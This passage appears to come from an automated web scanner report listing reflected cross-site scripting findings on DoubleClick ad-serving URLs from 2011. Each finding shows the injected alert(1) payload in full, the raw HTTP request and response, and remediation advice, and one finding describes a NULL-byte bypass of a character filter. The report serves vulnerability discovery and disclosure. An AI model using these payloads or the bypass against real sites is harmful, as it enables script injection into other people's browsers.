Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1875
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:55:05 GMT
Expires: Tue, 28 Jun 2011 03:55:05 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/ab/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=466917618445194561&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=e9d41"-alert(1)-"4c11fe208dc",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.com/api/placements/47553125.js\" type=\"text/javascript\">
...[SNIP]...

1.120. http://ad.doubleclick.net/adj/N3905.133090.MEDIAMATH/B5573625.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3905.133090.MEDIAMATH/B5573625.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97a47"-alert(1)-"b6016578f1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3905.133090.MEDIAMATH/B5573625.8;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=46691761844519456197a47"-alert(1)-"b6016578f1&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=466917618445194561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAAmUJcAAAAAAAmpJQAAAAAAAgDEAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAACqWjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMCvj6d8PwAAAAAAAAAAAADAr4-nfD8AAAAAAAAAAAAAwK-Pp3w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACSF45fvzRSCnjrvwKuJoe6W8wy-Iq0-q.noMVBAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3440664501%26r%3D0%26s%3D1887835,32df7b28-a13a-11e0-b230-57adb4c7cb09
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1874
Date: Tue, 28 Jun 2011 03:54:07 GMT

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/j%3B242491261%3B0-0%3B0%3B65259431%3B4307-300/250%3B42625654/42643441/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=46691761844519456197a47"-alert(1)-"b6016578f1&mt_id=120492&mt_adid=100929&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=",
siteId: "1109080",
placementId: "65259431"
};

document.write('\n<script src=\"http://cdn.royale.spongecell.c
...[SNIP]...

1.121. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54176"-alert(1)-"35e05f8a498 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=5354176"-alert(1)-"35e05f8a498&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:32:03 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=5354176"-alert(1)-"35e05f8a498&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "o
...[SNIP]...

1.122. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cda"-alert(1)-"eecdafd0da1 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747c3cda"-alert(1)-"eecdafd0da1&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:31:43 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747c3cda"-alert(1)-"eecdafd0da1&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.123. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79bd"-alert(1)-"583b910f332 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c79bd"-alert(1)-"583b910f332&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:32:24 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c79bd"-alert(1)-"583b910f332&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptacces
...[SNIP]...

1.124. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70284"-alert(1)-"c4ab2baee7c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=70284"-alert(1)-"c4ab2baee7c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:32:41 GMT
Expires: Tue, 28 Jun 2011 03:32:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=70284"-alert(1)-"c4ab2baee7chttp%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never
...[SNIP]...

1.125. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afcf2"-alert(1)-"63efab65b02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717afcf2"-alert(1)-"63efab65b02&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:31:26 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717afcf2"-alert(1)-"63efab65b02&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

1.126. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a3ba'-alert(1)-'01b7f7cedad was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=1004485a3ba'-alert(1)-'01b7f7cedad&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:54:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=1004485a3ba'-alert(1)-'01b7f7cedad&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.127. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0036e76"-alert(1)-"c692859c262 was submitted in the mt_adid parameter. This input was echoed as 36e76"-alert(1)-"c692859c262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448%0036e76"-alert(1)-"c692859c262&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6028
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:54:37 GMT
Expires: Tue, 28 Jun 2011 02:54:37 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
h%3Dv8/3b34/f/ad/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448%0036e76"-alert(1)-"c692859c262&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscr
...[SNIP]...

1.128. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c83d2'-alert(1)-'90040ac53db was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750c83d2'-alert(1)-'90040ac53db&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
